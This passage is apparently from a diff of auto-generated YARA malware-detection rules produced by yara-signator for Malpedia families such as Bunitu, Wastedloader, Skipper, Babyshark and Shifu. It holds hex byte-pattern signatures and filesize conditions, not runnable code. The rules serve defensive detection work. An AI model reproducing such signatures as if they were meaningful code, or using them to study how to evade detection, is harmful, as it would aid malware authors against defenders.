+		$sequence_0 = { ff742414 ba40000000 8bcf ff750c 50 e8???????? 83c40c }
+		$sequence_1 = { e9???????? 8b4318 8b560c 89542420 a828 745a b9???????? }
+		$sequence_2 = { c745dc00000000 89857cffffff 7432 50 8d4dd4 e8???????? ffb57cffffff }
+		$sequence_3 = { 894df4 85c9 743a 8bc8 33c0 83c101 13c0 }
+		$sequence_4 = { c6853fffffff00 8d95b8feffff ffb53fffffff 8d8df8fdffff c645fc2d e8???????? 83c404 }
+		$sequence_5 = { e8???????? 8b4df8 83c408 8b550c 6689044a 8a06 3c20 }
+		$sequence_6 = { 8d5e54 8bd3 894650 8bcf e8???????? 8bbd64feffff eb2d }
+		$sequence_7 = { e8???????? 83c408 e9???????? 8b442420 807c241700 0f8418030000 807e5700 }
+		$sequence_8 = { e8???????? 8bf8 8b45e4 03fe 13d3 83c701 13d3 }
+		$sequence_9 = { c6464400 8a4201 884645 803a00 746e 0fb64201 33c9 }
 
 	condition:
-		7 of them and filesize < 19812352
+		7 of them and filesize < 2998272
 }
-rule MALPEDIA_Win_Bunitu_Auto : FILE
+rule MALPEDIA_Win_Wastedloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad5c884d-40cc-596d-af5c-643847feb65b"
+		id = "c9b391e1-a439-5c84-8bc6-d01e7837fa3f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bunitu_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wastedloader_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "4579187f29545393632699d1b30240f12e5e7855e0bb344d18579a744895ea25"
+		logic_hash = "f52a5046711dc64fff342d42959b67fac6d384f1f957f74196d547273f13eb4f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83514,34 +83471,34 @@ rule MALPEDIA_Win_Bunitu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c70003000000 ff75f0 8f4004 ff75ec 8f4008 8bc8 }
-		$sequence_1 = { ff15???????? 59 5d 5a }
-		$sequence_2 = { 6a00 50 ff15???????? 6a00 68e8030000 ff15???????? 33c0 }
-		$sequence_3 = { aa 5a 5f 5e 42 5b }
-		$sequence_4 = { 6800000100 50 51 6800080000 6a00 }
-		$sequence_5 = { 8b85d8feffff 898538fdffff 6a10 8d8d34fdffff 51 ffb528fdffff ff15???????? }
-		$sequence_6 = { 668b85dcfeffff b901190000 49 663bc1 }
-		$sequence_7 = { 50 53 8d85caf7ffff 50 e8???????? }
-		$sequence_8 = { 837df000 7614 6a02 ff75f0 ff15???????? ff75f0 }
-		$sequence_9 = { 8dbd58feffff b91c000000 33c0 f3aa e8???????? 8945fc }
+		$sequence_0 = { 7444 eb00 686bb90000 ff15???????? }
+		$sequence_1 = { 7ed7 7488 09b31ced6185 1ce2 }
+		$sequence_2 = { e8???????? 3d1e050000 c10147 833b38 }
+		$sequence_3 = { a828 b409 1c04 e8???????? }
+		$sequence_4 = { 7aec e471 e8???????? 0057bb 038919fc885d e479 }
+		$sequence_5 = { b9b5000000 8b55f8 66894a4c 8b45f8 }
+		$sequence_6 = { 8b45f8 66895056 b9b8000000 8b55f8 66894a58 8b45f8 0fb74858 }
+		$sequence_7 = { 0200 00e7 aa 53 }
+		$sequence_8 = { 2cbe 832061 5b 5b }
+		$sequence_9 = { 8b55f8 0fb7421e 83e854 8b4df8 6689411e ba86000000 }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 2677760
 }
-rule MALPEDIA_Win_Gold_Dragon_Auto : FILE
+rule MALPEDIA_Win_Skipper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "991ba939-2d9f-52cd-813d-6925dfb8d9c9"
+		id = "efc6c970-e4f9-50aa-846f-5655368eb02c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gold_dragon_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skipper_auto.yar#L1-L422"
 		license_url = "N/A"
-		logic_hash = "1d3ddf008eb509566d50c074a1778063d25aa540d5f914350cb60f472b9c159b"
+		logic_hash = "37baa21ea468db7e2c53f174ee34fcc7e3c9a0f2d929add42b329e84f24f9a81"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -83553,32 +83510,68 @@ rule MALPEDIA_Win_Gold_Dragon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8890e0924000 eb1c f6c202 7410 8088????????20 8a9405ecfcffff }
-		$sequence_1 = { 8bc8 83e01f c1f905 8d04c0 8b0c8d00954000 8d44810c 50 }
-		$sequence_2 = { 85c0 a3???????? 0f84ad060000 8b35???????? 68???????? }
-		$sequence_3 = { 8bf1 8bc1 c1fe05 83e01f 8b34b500954000 8d04c0 8b0486 }
-		$sequence_4 = { 41 8079ff00 0f8547ffffff 8bc6 8088e193400008 }
-		$sequence_5 = { 8d8560ffffff 68???????? 50 e8???????? ffb64c834000 8d8560ffffff 50 }
-		$sequence_6 = { 51 ffd6 85c0 a3???????? 0f84dd030000 8b15???????? }
-		$sequence_7 = { 50 ffd6 85c0 a3???????? 0f8478060000 }
-		$sequence_8 = { 83e01f 8b0c8d00954000 8d04c0 8d0481 8b4dfc }
-		$sequence_9 = { 68???????? 50 ffd6 85c0 a3???????? 0f84d8050000 8b0d???????? }
+		$sequence_0 = { 6a00 6a00 6a03 68???????? 68???????? 6a50 }
+		$sequence_1 = { e8???????? 6804010000 e8???????? 6804010000 8bf8 }
+		$sequence_2 = { ff15???????? 6a00 6a00 6a00 6a00 68???????? 68???????? }
+		$sequence_3 = { b9???????? e8???????? 6a04 e8???????? 8bf8 57 }
+		$sequence_4 = { 320439 47 8847ff 4e 0f8568ffffff 8b4dfc }
+		$sequence_5 = { 8d95fcfeffff 03d0 8b85f8feffff 8a1a 0fb6c0 8d8dfcfeffff }
+		$sequence_6 = { 40 0fb60438 0fb6ca 03d8 03d9 81e3ff000080 7908 }
+		$sequence_7 = { 888405fcfeffff 40 3d00010000 7cf1 33db 33f6 }
+		$sequence_8 = { e8???????? 83c404 6a00 6a64 52 }
+		$sequence_9 = { 0fb645f8 8a8c05f0feffff 888deffeffff 0fb655fc 0fb645f8 }
+		$sequence_10 = { 48897c2420 4156 4881ec10010000 488b05???????? }
+		$sequence_11 = { 83c101 898ddcfeffff 8b95dcfeffff 3b5514 0f8dcf000000 8b45f8 83c001 }
+		$sequence_12 = { 488b05???????? 4833c4 4889842400010000 4c8b9c2440010000 33c9 }
+		$sequence_13 = { 0fb655fc 0fb645f8 8a8c15f0feffff 888c05f0feffff 0fb655fc 8a85effeffff 888415f0feffff }
+		$sequence_14 = { 8885eefeffff 8b4d10 038ddcfeffff 0fbe11 }
+		$sequence_15 = { 7d0d 41ffca 4181ca00ffffff 41ffc2 0fb6c1 }
+		$sequence_16 = { 888415f0feffff 0fb64df8 0fb6940df0feffff 0fb645fc 0fb68c05f0feffff 03d1 }
+		$sequence_17 = { 48 0d00ffffff 40 8945f8 8b4df8 0fb6940df0feffff }
+		$sequence_18 = { 41ffc8 4181c800ffffff 41ffc0 410fb6c0 }
+		$sequence_19 = { 450fb608 4803d0 0fb602 418800 44880a 410fb610 }
+		$sequence_20 = { 8d1492 03d2 2bc2 4863d0 420fb60432 }
+		$sequence_21 = { 0fb695e8feffff 8a85effeffff 888415f0feffff e9???????? }
+		$sequence_22 = { 488d1424 4c03c0 410fb6c2 450fb608 4803d0 0fb602 }
+		$sequence_23 = { 888deffeffff 0fb695e8feffff 8b85e0feffff 8a8c15f0feffff 888c05f0feffff 0fb695e8feffff }
+		$sequence_24 = { 492bfb ffc1 81e1ff000080 7d0a ffc9 }
+		$sequence_25 = { 83e61f c1e606 03348520b72300 8b45e4 }
+		$sequence_26 = { c78424a80000000f000000 c78424a400000000000000 c684249400000000 720f ffb424f4000000 e8???????? }
+		$sequence_27 = { 4883ec20 4863d9 488bf3 48c1fe05 4c8d3d32a50000 83e31f 486bdb58 }
+		$sequence_28 = { 33c5 8945fc 57 8d85f0feffff 50 }
+		$sequence_29 = { 488bcb 488bc3 488d15faa20000 48c1f805 }
+		$sequence_30 = { 8985d8feffff 6a00 6804010000 8d85f0feffff 50 8b8dd8feffff 51 }
+		$sequence_31 = { 7405 e8???????? 488b8ba0000000 488d05c3910000 483bc8 }
+		$sequence_32 = { 4885c0 7509 488d0543aa0000 eb04 4883c014 8938 e8???????? }
+		$sequence_33 = { 50 6a00 8b8dd4feffff 51 ff15???????? }
+		$sequence_34 = { 897e70 c686c800000043 c6864b01000043 c7466888a22300 }
+		$sequence_35 = { eb0a c785d4feffffffff1f00 8b4508 50 6a00 }
+		$sequence_36 = { 85f6 7447 8802 8b048d606d4100 }
+		$sequence_37 = { 741a 488d0579d80000 483bf8 740e 833f00 }
+		$sequence_38 = { 736b 488bdf 488bf7 48c1fe05 4c8d2537ae0000 83e31f }
+		$sequence_39 = { 6a00 8b85d8feffff 50 8b8dd0feffff 51 6a00 6a00 }
+		$sequence_40 = { 8b45f4 46 83fa03 750e 8b0c85606d4100 }
+		$sequence_41 = { 7367 4863d9 4c8d359aa40000 488bfb 83e31f }
+		$sequence_42 = { 488d0d86a30000 488bc2 83e21f 48c1f805 486bd258 488b04c1 }
+		$sequence_43 = { 59 8945e4 8b7508 c7465cd8812300 33ff }
+		$sequence_44 = { 8bd8 85f6 7478 8b45fc }
+		$sequence_45 = { 83ef80 83c410 8975f0 897dec 3bf3 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Dlrat_Auto : FILE
+rule MALPEDIA_Win_Backbend_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7bb91210-a1a6-58a8-9c5b-ff8edf88b110"
+		id = "c7ec5485-6e9e-5eb4-aaaa-c0daf2bd8fb9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dlrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dlrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.backbend_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "a3f1e1206cd1c309e34cacc09c3103fc944a2e61c558b93390de2cb1efae2fc5"
+		logic_hash = "935509ae6988f2d539b3ef5a76f3b49b19110a268e5a967dacc21ae1460d274a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83592,32 +83585,32 @@ rule MALPEDIA_Win_Dlrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d0de60b1600 e8???????? 488975b0 4989d9 4531c0 baaa020000 488d0dcb0b1600 }
-		$sequence_1 = { 488d1df28e0500 48895dc8 48c745c011000000 488d55c0 488d0dcb8e0500 48894dd8 48c745d009000000 }
-		$sequence_2 = { e8???????? 85c0 7818 3de4000000 7311 4898 488d0d723b0100 }
-		$sequence_3 = { e8???????? 83fb01 7754 488d05aa270b00 488945a8 48c745a000000000 488d55a0 }
-		$sequence_4 = { 48ffc0 482bd8 48899df0fcffff 488b9de8fcffff 4803d8 48899df8fcffff 488d0513701600 }
-		$sequence_5 = { 488b8d20ffffff 4883ec20 e8???????? 4883c420 4889c2 488d0de71f1800 4883ec20 }
-		$sequence_6 = { 41c64424076c 41c644240863 41c644240979 41c644240a39 41c644240b6f 41c644240c5a 41c644240d57 }
-		$sequence_7 = { 488b03 488985a0fcffff 488995a8fcffff 488b3d???????? 488b97b0000000 488b87a8000000 488985b0fcffff }
-		$sequence_8 = { e8???????? 48c745b000000000 4c8bce 4c8bc3 ba2f070000 488d0d5e411500 e8???????? }
-		$sequence_9 = { ffc1 e8???????? 48894580 48895588 488d4580 48898520ffffff 488d1d6a691000 }
+		$sequence_0 = { e8???????? 83c40c 8d45f0 c745d801000000 66c745dc0500 50 }
+		$sequence_1 = { 56 ffd3 6a00 8d8500ffffff }
+		$sequence_2 = { c3 8b442404 8a08 84c9 7408 80e904 }
+		$sequence_3 = { ebf2 c3 55 8bec 81ec0c010000 }
+		$sequence_4 = { 6860ea0000 ffd6 33c0 8d8d00feffff 50 }
+		$sequence_5 = { 50 e8???????? 8d8500fbffff 53 50 e8???????? }
+		$sequence_6 = { c605????????43 ff15???????? 8bf0 68???????? }
+		$sequence_7 = { 85c0 7508 6a01 58 e9???????? 6a07 }
+		$sequence_8 = { 57 ffd6 85c0 740b 50 ff15???????? }
+		$sequence_9 = { c745d801000000 66c745dc0500 50 8d45ac 50 53 }
 
 	condition:
-		7 of them and filesize < 4121600
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Deltastealer_Auto : FILE
+rule MALPEDIA_Win_Topinambour_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4fccefcb-7a2e-57a6-ab41-b89b24454179"
+		id = "248239f8-95b8-583c-8553-e48d7a46283a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deltastealer_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.topinambour"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.topinambour_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "8e1fc56421c67233761e9d4924d596056974746fe89cb951900a859521620234"
+		logic_hash = "3b116af57ab25dd36210660cdcf34a024e37c1d655144c3fd22d92727ae67613"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83631,32 +83624,32 @@ rule MALPEDIA_Win_Deltastealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb5d 31ff eb18 48314618 4889f1 e8???????? 488b4638 }
-		$sequence_1 = { 4d89d7 40b601 83ff01 0f8583000000 4181fcff000000 0f873c050000 4885db }
-		$sequence_2 = { e8???????? 8a5860 4889f9 e8???????? 448a7060 4889f9 e8???????? }
-		$sequence_3 = { c3 4d89c8 e8???????? 0f0b 4157 4156 4155 }
-		$sequence_4 = { e8???????? 4889f9 89ea e8???????? 41c60707 4883c438 5b }
-		$sequence_5 = { 498b4e28 498b5630 41c60709 41c7471802000000 e8???????? 90 4883c438 }
-		$sequence_6 = { eb18 488b4e40 4883c118 e8???????? e8???????? 488906 895608 }
-		$sequence_7 = { e8???????? 0f0b ba08000000 4889f0 4883c420 5b 5f }
-		$sequence_8 = { e8???????? 4829fe 4c89f1 4889f2 4883c428 5b 5f }
-		$sequence_9 = { 8b90cc000000 895108 83a0c400000000 e8???????? c70701000000 894704 }
+		$sequence_0 = { 2b1d 09 1106 1107 }
+		$sequence_1 = { 02 282100000a 6f2200000a 25 6f1d00000a 16 6f2300000a }
+		$sequence_2 = { 1105 8d0f000001 1306 16 1307 }
+		$sequence_3 = { 6f1d00000a 7245000070 6f2000000a 25 6f1d00000a 7255000070 02 }
+		$sequence_4 = { 20204e0000 6f0c00000a 09 2060ea0000 6f0d00000a }
+		$sequence_5 = { 25 721d000070 6f0500000a 25 }
+		$sequence_6 = { 730900000a 0c 6f0a00000a 17 1c 730b00000a }
+		$sequence_7 = { 25 6f1d00000a 7255000070 02 282100000a }
+		$sequence_8 = { 2e06 731000000a 7a 1104 16 }
+		$sequence_9 = { 6f1400000a 2802000006 1308 281300000a 1108 6f1500000a }
 
 	condition:
-		7 of them and filesize < 3532800
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Mozart_Auto : FILE
+rule MALPEDIA_Win_Evilconwi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e6ef70f1-9d8c-5900-bac0-94145c939b8a"
+		id = "7f652ca8-a434-5be9-ae21-4e0e49d2fcee"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mozart_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilconwi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.evilconwi_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "3d072f882d8d032cd0ba33880719776c6c63b0d1fb641e5640a7afb53ae04bf9"
+		logic_hash = "212869a6ab86c4f0f11665af7cc6fecf827786dd09d766a1df9e90f9f4dd950f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83670,32 +83663,32 @@ rule MALPEDIA_Win_Mozart_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f6 c644241800 eb26 8d4c2418 51 }
-		$sequence_1 = { 8b542468 41 3bca 736e 8bd0 }
-		$sequence_2 = { 7c19 3c39 7f15 bd01000000 eb08 3c30 7c36 }
-		$sequence_3 = { 7471 c1e006 0bc7 a900000001 7425 }
-		$sequence_4 = { 0f84a0010000 48 0f84e6000000 48 0f85fd010000 85ed 7544 }
-		$sequence_5 = { 0fbe0a 8a89c8924000 0fb6f9 8bcf 42 83e940 }
-		$sequence_6 = { 8a08 40 84c9 75f9 8b8c2420100000 }
-		$sequence_7 = { 90 8a82e0ba4000 3a841420010000 751f b8???????? }
-		$sequence_8 = { 83fe10 7409 33f6 c644241800 eb39 80fb3d 740e }
-		$sequence_9 = { 3bd0 72e2 5e 32c0 }
+		$sequence_0 = { 83c8ff eb07 8b04cd54e14000 5f 5e 5b }
+		$sequence_1 = { eb3d 8b0b 894dfc 8d048dac1b4100 8b30 90 }
+		$sequence_2 = { c700???????? 8b4508 898850030000 8b4508 59 c7404898134100 8b4508 }
+		$sequence_3 = { 56 57 8d1c85f01e4100 8b03 8b15???????? 83cfff }
+		$sequence_4 = { 72eb 6a00 ff75e4 ff15???????? ff75d0 }
+		$sequence_5 = { 50 6a00 6a0b ff75f8 ffd7 85c0 0f84a6000000 }
+		$sequence_6 = { 660f58e0 660fc5c400 25f0070000 660f28a060f74000 660f28b850f34000 }
+		$sequence_7 = { 8b45fc 03148d781f4100 8b00 894218 8a03 884228 }
+		$sequence_8 = { 50 8d45fc c745dc04000000 50 6a00 6a0b }
+		$sequence_9 = { 8b04bd781f4100 807c302900 7504 32c0 eb1a 8d45fc 50 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Wslink_Auto : FILE
+rule MALPEDIA_Win_Unidentified_098_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff84d0ba-7c6b-551a-aa8c-f9cc4b863272"
+		id = "cee1322b-e182-5772-a21f-5cf6e6750059"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wslink_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_098_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "87e90a1a72b66a6938037799ecf454860aae5ad77216cc7fb9189ea554932eeb"
+		logic_hash = "e8d2888b0e7d3535c791d7aba0e1785261ca562eca0e4741087a888aec2763e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83709,32 +83702,32 @@ rule MALPEDIA_Win_Wslink_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd0 e8???????? 4885c0 7494 48638ba0000000 488bd1 3b8ba4000000 }
-		$sequence_1 = { 488b8be8000000 4885c9 7405 e8???????? 488b7b08 4885ff }
-		$sequence_2 = { 488b05???????? 4833c4 48898424c0000000 33db 458be1 4c89442450 4183cfff }
-		$sequence_3 = { 4c8d0d633b0a00 448d400d e9???????? 83781000 0f859f000000 83780800 0f8495000000 }
-		$sequence_4 = { 418bc5 e9???????? bad9000000 4c8d0d96920700 b910000000 448d42b3 c7442420d8000000 }
-		$sequence_5 = { 4885c0 743d 4885f6 740e 660f1f440000 48ffce 881c06 }
-		$sequence_6 = { 7532 4c8d0d97450a00 8d4810 448d4008 ba9a000000 c744242048010000 e8???????? }
-		$sequence_7 = { 488bd8 4885c0 752b 4c8d0d885f0b00 8d506c 8d4820 448d4041 }
-		$sequence_8 = { 0302 6690 e11c 0100 ec 1c01 00d6 }
-		$sequence_9 = { e8???????? 8b8c2490000000 4885c0 746e 894b08 4d8b0f 498b5500 }
+		$sequence_0 = { 4c89f1 e8???????? b901000000 4989c5 e8???????? 4989c4 0fb644244f }
+		$sequence_1 = { e9???????? 498b0424 8954244c 4c89e1 4488442440 ff5048 8b54244c }
+		$sequence_2 = { 488945b0 488b45c8 0fb64038 3c01 7423 84c0 0f849e000000 }
+		$sequence_3 = { 48397c2448 0f83b5000000 488b4310 488b5318 c644244401 4839d0 }
+		$sequence_4 = { 7426 662e0f1f840000000000 498b4c2408 4885c9 7446 4983c420 e8???????? }
+		$sequence_5 = { 4c89f7 31c0 f3aa b903000000 c744244c04010000 4989f0 4c89f2 }
+		$sequence_6 = { 4e8d0441 4c894220 4e8d0c49 4c894a30 41b900000080 4c39c8 7c1b }
+		$sequence_7 = { c744243c00000000 89442420 e8???????? b804000000 4d8d442410 488b542448 488b4c2440 }
+		$sequence_8 = { 3c20 7407 88842f39010000 488b8ba0000000 e8???????? 4885c0 0f84a6020000 }
+		$sequence_9 = { e8???????? 418b442414 83f80a 7580 0f1f00 49ff442430 49c744242800000000 }
 
 	condition:
-		7 of them and filesize < 2007040
+		7 of them and filesize < 3345408
 }
-rule MALPEDIA_Win_Oatboat_Auto : FILE
+rule MALPEDIA_Win_Babyshark_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4613e236-064b-571a-be7e-ff2a01da6b41"
+		id = "bba62dea-b8fb-5177-af59-ee7484609223"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oatboat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oatboat_auto.yar#L1-L103"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.babyshark_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "7413375bcf19ea166467a5406a23466233d2d4aaf455c3de8007d0b602ee838d"
+		logic_hash = "170a55c792dd841a430b5276e4b7ea8cd0c0e2d28c406b503a22728951bd6c1d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83748,30 +83741,32 @@ rule MALPEDIA_Win_Oatboat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745e465655669 c745e872747561 c745ec6c4d656d c745f06f727900 e8???????? 41b900800000 }
-		$sequence_1 = { 488d0dc20b0000 ff15???????? 33c0 4883c450 415f }
-		$sequence_2 = { 4c896538 c745e04e74416c c745e46c6f6361 c745e874655669 c745ec72747561 c745f06c4d656d c745f46f727900 }
-		$sequence_3 = { c745e8656d6f72 66c745ec7900 e8???????? 4d8bc4 }
-		$sequence_4 = { c745ec72747561 c745f06c4d656d c745f46f727900 e8???????? 4c8d4d38 c744242840000000 4533c0 }
-		$sequence_5 = { 488bc8 e8???????? 488bd8 488b7c2458 488bc3 }
-		$sequence_6 = { 7527 488d4df0 c745f04c6f6164 c745f44c696272 c745f861727957 44887dfc e8???????? }
-		$sequence_7 = { c745ec33003200 c745f02e004400 c745f44c004c00 e8???????? }
+		$sequence_0 = { 83c40c 8d4c2404 6a00 51 ffd6 6a00 }
+		$sequence_1 = { 8bc8 83e01f c1f905 8b0c8d607e4000 8a44c104 83e040 }
+		$sequence_2 = { 8b0c8d607e4000 8a44c104 83e040 c3 a1???????? }
+		$sequence_3 = { bf???????? f3ab 8d3452 895dfc c1e604 aa 8d9ec8674000 }
+		$sequence_4 = { 80e920 ebe0 80a0206c400000 40 3bc6 72be 5e }
+		$sequence_5 = { 8db6bc674000 bf???????? a5 a5 59 a3???????? }
+		$sequence_6 = { 8a8094504000 83e00f eb02 33c0 0fbe84c6b4504000 }
+		$sequence_7 = { c1f804 83f807 8945d0 0f879a060000 ff2485271a4000 834df0ff }
+		$sequence_8 = { 5e 8d0c8dc8614000 3bc1 7304 3910 7402 }
+		$sequence_9 = { ff15???????? 8bf0 68???????? 8d442408 68???????? 50 }
 
 	condition:
-		7 of them and filesize < 58368
+		7 of them and filesize < 65272
 }
-rule MALPEDIA_Win_Madmax_Auto : FILE
+rule MALPEDIA_Win_Shifu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "211dedfc-7c78-54d2-bc9c-659fc1684566"
+		id = "94131f96-f004-59ab-be06-e4302b4af25a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.madmax_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shifu_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "cf6b2a7b533fb3f99bc15493e8a8779b3f938c747aabda5388a89eac12fccb62"
+		logic_hash = "c03c0d8c15de6f3e31605e542d8b0452407c2c6c3eb4ca0055ffada2d5d050db"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83785,32 +83780,32 @@ rule MALPEDIA_Win_Madmax_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f605????????5a 0f85ea000000 95 8883424ceb3e 38af847bb313 8320aa d590 }
-		$sequence_1 = { fa 768b 872a fd 2a4f0e e8???????? b3df }
-		$sequence_2 = { af 2f ac 7cd6 45 98 92 }
-		$sequence_3 = { bf45f19eb2 ac a5 d6 34e2 1117 4c }
-		$sequence_4 = { e6d1 f5 9f 45 7b78 39770f d0de }
-		$sequence_5 = { b4bf 49 95 14c0 393f d8d3 fc }
-		$sequence_6 = { 7135 fd 9e 9d 50 50 9c }
-		$sequence_7 = { c9 09f8 96 67a4 61 52 636e85 }
-		$sequence_8 = { 9d 53 6a03 e8???????? 83c40c 9c f605????????e8 }
-		$sequence_9 = { be492ea060 c14434e19e 46 2f d3f4 fa 6be92a }
+		$sequence_0 = { 895dfc 6a08 58 e8???????? 8bc4 85c0 7411 }
+		$sequence_1 = { 56 e8???????? 85c0 0f848d010000 ff7508 683a041000 e8???????? }
+		$sequence_2 = { 83c420 f644242010 741c 6a04 6a00 ff742418 e8???????? }
+		$sequence_3 = { 83c604 833e00 75a3 83c714 8b470c 85c0 0f8573ffffff }
+		$sequence_4 = { 6800200000 57 57 6a02 ff15???????? 8bd8 3bdf }
+		$sequence_5 = { 7516 6aff 53 ff15???????? 83f8ff 7408 53 }
+		$sequence_6 = { 85c0 7540 3945f4 7447 ff15???????? 8b75f8 8365f400 }
+		$sequence_7 = { 50 68060000c8 56 c7442430b907a225 c744243660468ee9 c744243a76e58c74 66c744243e063e }
+		$sequence_8 = { 50 ff15???????? 6a10 58 e8???????? 8bc4 3bc7 }
+		$sequence_9 = { e8???????? 50 ffd6 893d???????? 3bc7 740a c705????????01000000 }
 
 	condition:
-		7 of them and filesize < 3227648
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Targetcompany_Auto : FILE
+rule MALPEDIA_Win_Enfal_Auto : FILE
 {
 	meta:
